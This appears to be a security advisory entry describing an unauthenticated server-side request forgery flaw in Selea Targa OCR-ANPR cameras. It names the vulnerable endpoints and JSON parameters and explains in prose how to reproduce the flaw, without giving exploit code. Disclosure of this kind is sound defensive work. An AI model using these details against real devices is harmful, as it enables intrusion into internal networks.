A server-side request forgery (SSRF) vulnerability has been identified in multiple models of Selea Targa IP OCR-ANPR cameras. This vulnerability arises because the application does not properly validate user-supplied input in JSON POST parameters, such as 'ipnotify_address' and 'url'. These parameters are utilized by internal mechanisms to fetch images and perform DNS lookups. As a result, remote unauthenticated attackers can manipulate the system into making arbitrary HTTP requests to internal or external servers, potentially bypassing firewall restrictions or allowing internal service enumeration.
Exploitation of this vulnerability could lead to unauthorized HTTP requests being made to internal or external systems, potentially bypassing firewall controls and allowing enumeration of internal services.
The vulnerability can be reproduced by sending a POST request to the '/cps/test_backup_server' endpoint with the 'ipnotify_address' parameter set to an external URL. The response will indicate whether the request was successfully sent, demonstrating the SSRF vulnerability. Alternatively, the '/cps/test_url' endpoint can be used to achieve the same effect by specifying a URL in the 'url' parameter.
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.
